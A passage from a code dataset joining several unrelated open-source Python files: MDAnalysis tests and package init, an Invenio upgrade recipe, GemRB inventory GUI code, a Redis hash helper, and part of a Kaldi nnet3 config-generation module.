assert 'fragments' not in u._cache['_valid']
assert len(fgs) > len(u.atoms.fragments) # recomputed
def test_atomgroup_fragment_cache_invalidation_bond_breaking(self):
u = case1()
fgs = u.atoms.fragments
assert fgs is u.atoms._cache['fragments']
assert u.atoms._cache_key in u._cache['_valid']['fragments']
u.delete_bonds((u.atoms.bonds[3],)) # should trigger invalidation
assert 'fragments' not in u._cache['_valid']
assert len(fgs) < len(u.atoms.fragments) # recomputed
def test_tpr_fragments():
ag = mda.Universe(TPR, XTC).atoms
frags = ag.fragments
fragindices = ag.fragindices
assert len(frags[0]) == 3341
assert len(fragindices) == len(ag)
assert len(np.unique(fragindices)) == len(frags)
assert ag.n_fragments == len(frags)
| MDAnalysis/mdanalysis | testsuite/MDAnalysisTests/core/test_fragments.py | Python | gpl-2.0 | 7,995 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Fixes foreign key relationship."""
from invenio_ext.sqlalchemy import db
from invenio_upgrader.api import op
depends_on = ['invenio_2015_03_03_tag_value']
def info():
"""Return upgrade recipe information."""
return "Fixes foreign key relationship."
def do_upgrade():
"""Carry out the upgrade."""
op.alter_column(
table_name='oaiHARVESTLOG',
column_name='bibupload_task_id',
type_=db.MediumInteger(15, unsigned=True),
existing_nullable=False,
existing_server_default='0'
)
def estimate():
"""Estimate running time of upgrade in seconds (optional)."""
return 1
def pre_upgrade():
"""Pre-upgrade checks."""
pass
def post_upgrade():
"""Post-upgrade checks."""
pass
| hachreak/invenio-oaiharvester | invenio_oaiharvester/upgrades/oaiharvester_2015_07_14_innodb.py | Python | gpl-2.0 | 1,535 |
from oracleplsqlsource import OraclePLSQLSource
class OracleJavaSource(OraclePLSQLSource):
def __init__(self, name, source):
self.name = name
#debug_message("debug: generating java source ")
OraclePLSQLSource.__init__(self,source)
| sawdog/OraclePyDoc | oraclepydoc/oracleobjects/oraclejavasource.py | Python | gpl-2.0 | 261 |
# -*-python-*-
# GemRB - Infinity Engine Emulator
# Copyright (C) 2003-2004 The GemRB Project
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# GUIINV.py - scripts to control inventory windows from GUIINV winpack
###################################################
import GemRB
import GUICommon
import GUICommonWindows
import InventoryCommon
from GUIDefines import *
from ie_stats import *
from ie_slots import *
from ie_spells import *
from ie_restype import RES_BAM
InventoryWindow = None
def InitInventoryWindow (Window):
global InventoryWindow
Window.AddAlias("WIN_INV")
InventoryWindow = Window
#ground items scrollbar
ScrollBar = Window.GetControl (66)
ScrollBar.SetEvent (IE_GUI_SCROLLBAR_ON_CHANGE, RefreshInventoryWindow)
# Ground Items (6)
for i in range (5):
Button = Window.GetControl (i+68)
Button.SetEvent (IE_GUI_MOUSE_ENTER_BUTTON, InventoryCommon.MouseEnterGround)
Button.SetEvent (IE_GUI_MOUSE_LEAVE_BUTTON, InventoryCommon.MouseLeaveGround)
Button.SetVarAssoc ("GroundItemButton", i)
Button.SetFont ("NUMFONT")
Button = Window.GetControl (81)
Button.SetTooltip (12011)
Button.SetVarAssoc ("GroundItemButton", 6)
Button.SetFont ("NUMFONT")
Button.SetFlags (IE_GUI_BUTTON_ALIGN_RIGHT | IE_GUI_BUTTON_ALIGN_BOTTOM | IE_GUI_BUTTON_PICTURE, OP_OR)
#major & minor clothing color
Button = Window.GetControl (62)
Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.MajorPress)
Button.SetTooltip (12007)
Button = Window.GetControl (63)
Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.MinorPress)
Button.SetTooltip (12008)
#hair & skin color
Button = Window.GetControl (82)
Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.HairPress)
Button.SetTooltip (37560)
Button = Window.GetControl (83)
Button.SetFlags (IE_GUI_BUTTON_PICTURE,OP_OR)
Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.SkinPress)
Button.SetTooltip (37559)
# paperdoll
Button = Window.GetControl (50)
Button.SetState (IE_GUI_BUTTON_LOCKED)
Button.SetFlags (IE_GUI_BUTTON_NO_IMAGE | IE_GUI_BUTTON_PICTURE | IE_GUI_BUTTON_ANIMATED, OP_SET)
Button.SetEvent (IE_GUI_BUTTON_ON_DRAG_DROP, InventoryCommon.OnAutoEquip)
# portrait
Button = Window.GetControl (84)
Button.SetState (IE_GUI_BUTTON_LOCKED)
Button.SetFlags (IE_GUI_BUTTON_NO_IMAGE | IE_GUI_BUTTON_PICTURE, OP_SET)
# armor class
Label = Window.GetControl (0x10000038)
Label.SetTooltip (17183)
# hp current
Label = Window.GetControl (0x10000039)
Label.SetTooltip (17184)
# hp max
Label = Window.GetControl (0x1000003a)
Label.SetTooltip (17378)
# info label, game paused, etc
Label = Window.GetControl (0x1000003f)
Label.SetText ("")
SlotCount = GemRB.GetSlotType (-1)["Count"]
for slot in range (SlotCount):
SlotType = GemRB.GetSlotType (slot+1)
if SlotType["ID"]:
Button = Window.GetControl (SlotType["ID"])
Button.SetEvent (IE_GUI_MOUSE_ENTER_BUTTON, InventoryCommon.MouseEnterSlot)
Button.SetEvent (IE_GUI_MOUSE_LEAVE_BUTTON, InventoryCommon.MouseLeaveSlot)
Button.SetVarAssoc ("ItemButton", slot+1)
Button.SetFont ("NUMFONT")
GemRB.SetVar ("TopIndex", 0)
for i in range (4):
Button = Window.GetControl (109+i)
Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, ChangeWeaponPressed)
Button.SetVarAssoc("Equipped", i)
Button.SetFlags (IE_GUI_BUTTON_RADIOBUTTON, OP_OR)
#Why they mess up .chu's i don't know
Button.SetSprites("INVBUT3", i, 0, 1, 2, 3)
return
def ChangeWeaponPressed ():
pc = GemRB.GameGetSelectedPCSingle ()
Equipped = GemRB.GetVar ("Equipped")
GemRB.SetEquippedQuickSlot (pc, Equipped, -1)
return
#complete update
def UpdateInventoryWindow (Window):
pc = GemRB.GameGetSelectedPCSingle ()
Container = GemRB.GetContainer (pc, 1)
ScrollBar = Window.GetControl (66)
Count = Container['ItemCount']
if Count<1:
Count=1
ScrollBar.SetVarAssoc ("TopIndex", Count)
Equipped = GemRB.GetEquippedQuickSlot (pc, 1)
GemRB.SetVar ("Equipped", Equipped)
for i in range (4):
Button = Window.GetControl (109+i)
Button.SetVarAssoc("Equipped", i)
RefreshInventoryWindow ()
# populate inventory slot controls
SlotCount = GemRB.GetSlotType (-1)["Count"]
for i in range (SlotCount):
InventoryCommon.UpdateSlot (pc, i)
return
InventoryCommon.UpdateInventoryWindow = UpdateInventoryWindow
ToggleInventoryWindow = GUICommonWindows.CreateTopWinLoader(2, "GUIINV", GUICommonWindows.ToggleWindow, InitInventoryWindow, UpdateInventoryWindow)
OpenInventoryWindow = GUICommonWindows.CreateTopWinLoader(2, "GUIINV", GUICommonWindows.OpenWindowOnce, InitInventoryWindow, UpdateInventoryWindow)
def RefreshInventoryWindow ():
Window = InventoryWindow
pc = GemRB.GameGetSelectedPCSingle ()
# name
Label = Window.GetControl (0x10000032)
Label.SetText (GemRB.GetPlayerName (pc, 0))
# paperdoll
Button = Window.GetControl (50)
Color1 = GemRB.GetPlayerStat (pc, IE_METAL_COLOR)
Color2 = GemRB.GetPlayerStat (pc, IE_MINOR_COLOR)
Color3 = GemRB.GetPlayerStat (pc, IE_MAJOR_COLOR)
Color4 = GemRB.GetPlayerStat (pc, IE_SKIN_COLOR)
Color5 = GemRB.GetPlayerStat (pc, IE_LEATHER_COLOR)
Color6 = GemRB.GetPlayerStat (pc, IE_ARMOR_COLOR)
Color7 = GemRB.GetPlayerStat (pc, IE_HAIR_COLOR)
Button.SetFlags (IE_GUI_BUTTON_CENTER_PICTURES, OP_OR)
pdoll = GUICommonWindows.GetActorPaperDoll (pc)+"G11"
if GemRB.HasResource (pdoll, RES_BAM):
Button.SetAnimation (pdoll)
Button.SetAnimationPalette (Color1, Color2, Color3, Color4, Color5, Color6, Color7, 0)
# portrait
Button = Window.GetControl (84)
Button.SetPicture (GemRB.GetPlayerPortrait (pc, 0)["Sprite"])
# encumbrance
GUICommon.SetEncumbranceLabels (Window, 0x10000042, None, pc)
# armor class
ac = GemRB.GetPlayerStat (pc, IE_ARMORCLASS)
Label = Window.GetControl (0x10000038)
Label.SetText (str (ac))
# hp current
hp = GemRB.GetPlayerStat (pc, IE_HITPOINTS)
Label = Window.GetControl (0x10000039)
Label.SetText (str (hp))
# hp max
hpmax = GemRB.GetPlayerStat (pc, IE_MAXHITPOINTS)
Label = Window.GetControl (0x1000003a)
Label.SetText (str (hpmax))
# party gold
Label = Window.GetControl (0x10000040)
Label.SetText (str (GemRB.GameGetPartyGold ()))
Button = Window.GetControl (62)
Color = GemRB.GetPlayerStat (pc, IE_MAJOR_COLOR, 1) & 0xFF
Button.SetBAM ("COLGRAD", 0, 0, Color)
Button = Window.GetControl (63)
Color = GemRB.GetPlayerStat (pc, IE_MINOR_COLOR, 1) & 0xFF
Button.SetBAM ("COLGRAD", 0, 0, Color)
Button = Window.GetControl (82)
Color = GemRB.GetPlayerStat (pc, IE_HAIR_COLOR, 1) & 0xFF
Button.SetBAM ("COLGRAD", 0, 0, Color)
Button = Window.GetControl (83)
Color = GemRB.GetPlayerStat (pc, IE_SKIN_COLOR, 1) & 0xFF
Button.SetBAM ("COLGRAD", 0, 0, Color)
# update ground inventory slots
Container = GemRB.GetContainer(pc, 1)
TopIndex = GemRB.GetVar ("TopIndex")
for i in range (6):
if i<5:
Button = Window.GetControl (i+68)
else:
Button = Window.GetControl (i+76)
if GemRB.IsDraggingItem ()==1:
Button.SetState (IE_GUI_BUTTON_FAKEPRESSED)
else:
Button.SetState (IE_GUI_BUTTON_ENABLED)
Button.SetEvent (IE_GUI_BUTTON_ON_DRAG_DROP, InventoryCommon.OnDragItemGround)
Slot = GemRB.GetContainerItem (pc, i+TopIndex)
if Slot == None:
Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, None)
Button.SetEvent (IE_GUI_BUTTON_ON_RIGHT_PRESS, None)
Button.SetEvent (IE_GUI_BUTTON_ON_SHIFT_PRESS, None)
else:
Button.SetEvent (IE_GUI_BUTTON_ON_PRESS, InventoryCommon.OnDragItemGround)
Button.SetEvent (IE_GUI_BUTTON_ON_RIGHT_PRESS, InventoryCommon.OpenGroundItemInfoWindow)
Button.SetEvent (IE_GUI_BUTTON_ON_SHIFT_PRESS, InventoryCommon.OpenGroundItemAmountWindow)
GUICommon.UpdateInventorySlot (pc, Button, Slot, "ground")
#if actor is uncontrollable, make this grayed
GUICommon.AdjustWindowVisibility (Window, pc, False)
return
###################################################
# End of file GUIINV.py
| bradallred/gemrb | gemrb/GUIScripts/iwd2/GUIINV.py | Python | gpl-2.0 | 8,644 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
:mod:`MDAnalysis` --- analysis of molecular simulations in python
=================================================================
MDAnalysis (https://www.mdanalysis.org) is a python toolkit to analyze
molecular dynamics trajectories generated by CHARMM, NAMD, Amber,
Gromacs, or LAMMPS.
It allows one to read molecular dynamics trajectories and access the
atomic coordinates through numpy arrays. This provides a flexible and
relatively fast framework for complex analysis tasks. In addition,
CHARMM-style atom selection commands are implemented. Trajectories can
also be manipulated (for instance, fit to a reference structure) and
written out. Time-critical code is written in C for speed.
Help is also available through the mailinglist at
http://groups.google.com/group/mdnalysis-discussion
Please report bugs and feature requests through the issue tracker at
https://github.com/MDAnalysis/mdanalysis/issues
Citation
--------
When using MDAnalysis in published work, please cite
R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
MDAnalysis: A Python package for the rapid analysis of molecular dynamics
simulations. In S. Benthall and S. Rostrup, editors, Proceedings of the 15th
Python in Science Conference, pages 98-105, Austin, TX, 2016. SciPy,
doi:10.25080/majora-629e541a-00e
N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and
O. Beckstein. MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics
Simulations. J. Comput. Chem. 32 (2011), 2319--2327, doi:`10.1002/jcc.21787`_
https://www.mdanalysis.org
For citations of included algorithms and sub-modules please see the references_.
.. _`10.1002/jcc.21787`: http://dx.doi.org/10.1002/jcc.21787
.. _references: https://docs.mdanalysis.org/documentation_pages/references.html
Getting started
---------------
Import the package::
>>> import MDAnalysis
(note that not everything in MDAnalysis is imported right away; for
additional functionality you might have to import sub-modules
separately, e.g. for RMS fitting ``import MDAnalysis.analysis.align``.)
Build a "universe" from a topology (PSF, PDB) and a trajectory (DCD, XTC/TRR);
here we are assuming that PSF, DCD, etc contain file names. If you don't have
trajectories at hand you can play with the ones that come with MDAnalysis for
testing (see below under `Examples`_)::
>>> u = MDAnalysis.Universe(PSF, DCD)
Select the C-alpha atoms and store them as a group of atoms::
>>> ca = u.select_atoms('name CA')
>>> len(ca)
214
Calculate the centre of mass of the CA and of all atoms::
>>> ca.center_of_mass()
array([ 0.06873595, -0.04605918, -0.24643682])
>>> u.atoms.center_of_mass()
array([-0.01094035, 0.05727601, -0.12885778])
Calculate the CA end-to-end distance (in angstroem)::
>>> import numpy as np
>>> coord = ca.positions
>>> v = coord[-1] - coord[0] # last Ca minus first one
>>> np.sqrt(np.dot(v, v,))
10.938133
Define a function eedist():
>>> def eedist(atoms):
... coord = atoms.positions
... v = coord[-1] - coord[0]
... return sqrt(dot(v, v,))
...
>>> eedist(ca)
10.938133
and analyze all timesteps *ts* of the trajectory::
>>> for ts in u.trajectory:
... print eedist(ca)
10.9381
10.8459
10.4141
9.72062
....
See Also
--------
:class:`MDAnalysis.core.universe.Universe` for details
Examples
--------
MDAnalysis comes with a number of real trajectories for testing. You
can also use them to explore the functionality and ensure that
everything is working properly::
from MDAnalysis import *
from MDAnalysis.tests.datafiles import PSF,DCD, PDB,XTC
u_dims_adk = Universe(PSF,DCD)
u_eq_adk = Universe(PDB, XTC)
The PSF and DCD file are a closed-form-to-open-form transition of
Adenylate Kinase (from [Beckstein2009]_) and the PDB+XTC file are ten
frames from a Gromacs simulation of AdK solvated in TIP4P water with
the OPLS/AA force field.
.. [Beckstein2009] O. Beckstein, E.J. Denning, J.R. Perilla and T.B. Woolf,
Zipping and Unzipping of Adenylate Kinase: Atomistic Insights into the
Ensemble of Open <--> Closed Transitions. J Mol Biol 394 (2009), 160--176,
doi:10.1016/j.jmb.2009.09.009
"""
__all__ = ['Universe', 'Writer', 'fetch_mmtf',
'AtomGroup', 'ResidueGroup', 'SegmentGroup']
import logging
import warnings
logger = logging.getLogger("MDAnalysis.__init__")
from .version import __version__
try:
from .authors import __authors__
except ImportError:
logger.info('Could not find authors.py, __authors__ will be empty.')
__authors__ = []
# Registry of Readers, Parsers and Writers known to MDAnalysis
# Metaclass magic fills these as classes are declared.
_READERS = {}
_READER_HINTS = {}
_SINGLEFRAME_WRITERS = {}
_MULTIFRAME_WRITERS = {}
_PARSERS = {}
_PARSER_HINTS = {}
_SELECTION_WRITERS = {}
_CONVERTERS = {}
# Registry of TopologyAttributes
_TOPOLOGY_ATTRS = {} # {attrname: cls}
_TOPOLOGY_TRANSPLANTS = {} # {name: [attrname, method, transplant class]}
_TOPOLOGY_ATTRNAMES = {} # {lower case name w/o _ : name}
# custom exceptions and warnings
from .exceptions import (
SelectionError, NoDataError, ApplicationError, SelectionWarning,
MissingDataWarning, ConversionWarning, FileFormatWarning,
StreamWarning
)
from .lib import log
from .lib.log import start_logging, stop_logging
logging.getLogger("MDAnalysis").addHandler(log.NullHandler())
del logging
# only MDAnalysis DeprecationWarnings are loud by default
warnings.filterwarnings(action='once', category=DeprecationWarning,
module='MDAnalysis')
from . import units
# Bring some often used objects into the current namespace
from .core.universe import Universe, Merge
from .core.groups import AtomGroup, ResidueGroup, SegmentGroup
from .coordinates.core import writer as Writer
# After Universe import
from .coordinates.MMTF import fetch_mmtf
from . import converters
from .due import due, Doi, BibTeX
due.cite(Doi("10.25080/majora-629e541a-00e"),
description="Molecular simulation analysis library",
path="MDAnalysis", cite_module=True)
due.cite(Doi("10.1002/jcc.21787"),
description="Molecular simulation analysis library",
path="MDAnalysis", cite_module=True)
del Doi, BibTeX
| MDAnalysis/mdanalysis | package/MDAnalysis/__init__.py | Python | gpl-2.0 | 7,425 |
import redis
from hashlib import sha1
class RedisHashLayer(object):
"""
A more memory-efficient way to store many small values in redis using hashes.
See http://antirez.com/post/redis-weekly-update-7.html
Note: add these config value to redis:
hash-max-zipmap-entries 512
hash-max-zipmap-value 512
"""
def __init__(self,connection,name):
self.connection = connection
self.name = name
def _get_hashname(self,key):
field = sha1(str(key)).hexdigest()
hashkey = "%s:%s" % (self.name, field[:4])
return (hashkey,field)
def __contains__(self,key):
hashkey,field = self._get_hashname(key)
res = self.connection.hget(hashkey,field)
if res:
return True
return False
def add(self,key):
hashkey,field = self._get_hashname(key)
self.connection.hset(hashkey,field,field)
return
def delete(self,key):
hashkey,field = self._get_hashname(key)
self.connection.hset(hashkey,field,field)
self.connection.hdel(hashkey,field)
return
def clear(self):
pipeline = self.connection.pipeline()
keys = self.connection.keys(self.name+"*")
for k in keys:
pipeline.delete(k)
pipeline.execute()
return
| dfdeshom/reds | reds/redis_hash_layer.py | Python | gpl-2.0 | 1,323 |
#!/usr/bin/env python
# Note: this file is part of some nnet3 config-creation tools that are now deprecated.
from __future__ import print_function
import os
import argparse
import sys
import warnings
import copy
from operator import itemgetter
def GetSumDescriptor(inputs):
sum_descriptors = inputs
while len(sum_descriptors) != 1:
cur_sum_descriptors = []
pair = []
while len(sum_descriptors) > 0:
value = sum_descriptors.pop()
if value.strip() != '':
pair.append(value)
if len(pair) == 2:
cur_sum_descriptors.append("Sum({0}, {1})".format(pair[0], pair[1]))
pair = []
if pair:
cur_sum_descriptors.append(pair[0])
sum_descriptors = cur_sum_descriptors
return sum_descriptors
# adds the input nodes and returns the descriptor
def AddInputLayer(config_lines, feat_dim, splice_indexes=[0], ivector_dim=0):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
output_dim = 0
components.append('input-node name=input dim=' + str(feat_dim))
list = [('Offset(input, {0})'.format(n) if n != 0 else 'input') for n in splice_indexes]
output_dim += len(splice_indexes) * feat_dim
if ivector_dim > 0:
components.append('input-node name=ivector dim=' + str(ivector_dim))
list.append('ReplaceIndex(ivector, t, 0)')
output_dim += ivector_dim
if len(list) > 1:
splice_descriptor = "Append({0})".format(", ".join(list))
else:
splice_descriptor = list[0]
print(splice_descriptor)
return {'descriptor': splice_descriptor,
'dimension': output_dim}
def AddNoOpLayer(config_lines, name, input):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append('component name={0}_noop type=NoOpComponent dim={1}'.format(name, input['dimension']))
component_nodes.append('component-node name={0}_noop component={0}_noop input={1}'.format(name, input['descriptor']))
return {'descriptor': '{0}_noop'.format(name),
'dimension': input['dimension']}
def AddLdaLayer(config_lines, name, input, lda_file):
return AddFixedAffineLayer(config_lines, name, input, lda_file)
def AddFixedAffineLayer(config_lines, name, input, matrix_file):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append('component name={0}_fixaffine type=FixedAffineComponent matrix={1}'.format(name, matrix_file))
component_nodes.append('component-node name={0}_fixaffine component={0}_fixaffine input={1}'.format(name, input['descriptor']))
return {'descriptor': '{0}_fixaffine'.format(name),
'dimension': input['dimension']}
def AddBlockAffineLayer(config_lines, name, input, output_dim, num_blocks):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
assert((input['dimension'] % num_blocks == 0) and
(output_dim % num_blocks == 0))
components.append('component name={0}_block_affine type=BlockAffineComponent input-dim={1} output-dim={2} num-blocks={3}'.format(name, input['dimension'], output_dim, num_blocks))
component_nodes.append('component-node name={0}_block_affine component={0}_block_affine input={1}'.format(name, input['descriptor']))
return {'descriptor' : '{0}_block_affine'.format(name),
'dimension' : output_dim}
def AddPermuteLayer(config_lines, name, input, column_map):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
permute_indexes = ",".join(map(lambda x: str(x), column_map))
components.append('component name={0}_permute type=PermuteComponent column-map={1}'.format(name, permute_indexes))
component_nodes.append('component-node name={0}_permute component={0}_permute input={1}'.format(name, input['descriptor']))
return {'descriptor': '{0}_permute'.format(name),
'dimension': input['dimension']}
def AddAffineLayer(config_lines, name, input, output_dim, ng_affine_options = "", max_change_per_component = 0.75):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
# Per-component max-change option
max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''
components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input['dimension'], output_dim, ng_affine_options, max_change_options))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
return {'descriptor': '{0}_affine'.format(name),
'dimension': output_dim}
def AddAffRelNormLayer(config_lines, name, input, output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0, self_repair_scale = None, max_change_per_component = 0.75):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
# self_repair_scale is a constant scaling the self-repair vector computed in RectifiedLinearComponent
self_repair_string = "self-repair-scale={0:.10f}".format(self_repair_scale) if self_repair_scale is not None else ''
# Per-component max-change option
max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''
components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input['dimension'], output_dim, ng_affine_options, max_change_options))
components.append("component name={0}_relu type=RectifiedLinearComponent dim={1} {2}".format(name, output_dim, self_repair_string))
components.append("component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, output_dim, norm_target_rms))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
component_nodes.append("component-node name={0}_relu component={0}_relu input={0}_affine".format(name))
component_nodes.append("component-node name={0}_renorm component={0}_renorm input={0}_relu".format(name))
return {'descriptor': '{0}_renorm'.format(name),
'dimension': output_dim}
def AddAffPnormLayer(config_lines, name, input, pnorm_input_dim, pnorm_output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input['dimension'], pnorm_input_dim, ng_affine_options))
components.append("component name={0}_pnorm type=PnormComponent input-dim={1} output-dim={2}".format(name, pnorm_input_dim, pnorm_output_dim))
components.append("component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, pnorm_output_dim, norm_target_rms))
component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
component_nodes.append("component-node name={0}_pnorm component={0}_pnorm input={0}_affine".format(name))
component_nodes.append("component-node name={0}_renorm component={0}_renorm input={0}_pnorm".format(name))
return {'descriptor': '{0}_renorm'.format(name),
'dimension': pnorm_output_dim}
def AddConvolutionLayer(config_lines, name, input,
input_x_dim, input_y_dim, input_z_dim,
filt_x_dim, filt_y_dim,
filt_x_step, filt_y_step,
num_filters, input_vectorization,
param_stddev = None, bias_stddev = None,
filter_bias_file = None,
is_updatable = True):
assert(input['dimension'] == input_x_dim * input_y_dim * input_z_dim)
components = config_lines['components']
component_nodes = config_lines['component-nodes']
conv_init_string = ("component name={name}_conv type=ConvolutionComponent "
"input-x-dim={input_x_dim} input-y-dim={input_y_dim} input-z-dim={input_z_dim} "
"filt-x-dim={filt_x_dim} filt-y-dim={filt_y_dim} "
"filt-x-step={filt_x_step} filt-y-step={filt_y_step} "
"input-vectorization-order={vector_order}".format(name = name,
input_x_dim = input_x_dim, input_y_dim = input_y_dim, input_z_dim = input_z_dim,
filt_x_dim = filt_x_dim, filt_y_dim = filt_y_dim,
filt_x_step = filt_x_step, filt_y_step = filt_y_step,
vector_order = input_vectorization))
if filter_bias_file is not None:
conv_init_string += " matrix={0}".format(filter_bias_file)
else:
conv_init_string += " num-filters={0}".format(num_filters)
components.append(conv_init_string)
component_nodes.append("component-node name={0}_conv_t component={0}_conv input={1}".format(name, input['descriptor']))
num_x_steps = (1 + (input_x_dim - filt_x_dim) / filt_x_step)
num_y_steps = (1 + (input_y_dim - filt_y_dim) / filt_y_step)
output_dim = num_x_steps * num_y_steps * num_filters;
return {'descriptor': '{0}_conv_t'.format(name),
'dimension': output_dim,
'3d-dim': [num_x_steps, num_y_steps, num_filters],
'vectorization': 'zyx'}
# The Maxpooling component assumes input vectorizations of type zyx
def AddMaxpoolingLayer(config_lines, name, input,
input_x_dim, input_y_dim, input_z_dim,
pool_x_size, pool_y_size, pool_z_size,
pool_x_step, pool_y_step, pool_z_step):
if input_x_dim < 1 or input_y_dim < 1 or input_z_dim < 1:
raise Exception("non-positive maxpooling input size ({0}, {1}, {2})".
format(input_x_dim, input_y_dim, input_z_dim))
if pool_x_size > input_x_dim or pool_y_size > input_y_dim or pool_z_size > input_z_dim:
raise Exception("invalid maxpooling pool size vs. input size")
if pool_x_step > pool_x_size or pool_y_step > pool_y_size or pool_z_step > pool_z_size:
raise Exception("invalid maxpooling pool step vs. pool size")
assert(input['dimension'] == input_x_dim * input_y_dim * input_z_dim)
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append('component name={name}_maxp type=MaxpoolingComponent '
'input-x-dim={input_x_dim} input-y-dim={input_y_dim} input-z-dim={input_z_dim} '
'pool-x-size={pool_x_size} pool-y-size={pool_y_size} pool-z-size={pool_z_size} '
'pool-x-step={pool_x_step} pool-y-step={pool_y_step} pool-z-step={pool_z_step} '.
format(name = name,
input_x_dim = input_x_dim, input_y_dim = input_y_dim, input_z_dim = input_z_dim,
pool_x_size = pool_x_size, pool_y_size = pool_y_size, pool_z_size = pool_z_size,
pool_x_step = pool_x_step, pool_y_step = pool_y_step, pool_z_step = pool_z_step))
component_nodes.append('component-node name={0}_maxp_t component={0}_maxp input={1}'.format(name, input['descriptor']))
num_pools_x = 1 + (input_x_dim - pool_x_size) / pool_x_step;
num_pools_y = 1 + (input_y_dim - pool_y_size) / pool_y_step;
num_pools_z = 1 + (input_z_dim - pool_z_size) / pool_z_step;
output_dim = num_pools_x * num_pools_y * num_pools_z;
return {'descriptor': '{0}_maxp_t'.format(name),
'dimension': output_dim,
'3d-dim': [num_pools_x, num_pools_y, num_pools_z],
'vectorization': 'zyx'}
def AddSoftmaxLayer(config_lines, name, input):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
components.append("component name={0}_log_softmax type=LogSoftmaxComponent dim={1}".format(name, input['dimension']))
component_nodes.append("component-node name={0}_log_softmax component={0}_log_softmax input={1}".format(name, input['descriptor']))
return {'descriptor': '{0}_log_softmax'.format(name),
'dimension': input['dimension']}
def AddSigmoidLayer(config_lines, name, input, self_repair_scale = None):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
# self_repair_scale is a constant scaling the self-repair vector computed in SigmoidComponent
self_repair_string = "self-repair-scale={0:.10f}".format(self_repair_scale) if self_repair_scale is not None else ''
components.append("component name={0}_sigmoid type=SigmoidComponent dim={1}".format(name, input['dimension'], self_repair_string))
component_nodes.append("component-node name={0}_sigmoid component={0}_sigmoid input={1}".format(name, input['descriptor']))
return {'descriptor': '{0}_sigmoid'.format(name),
'dimension': input['dimension']}
def AddOutputLayer(config_lines, input, label_delay = None, suffix=None, objective_type = "linear"):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
name = 'output'
if suffix is not None:
name = '{0}-{1}'.format(name, suffix)
if label_delay is None:
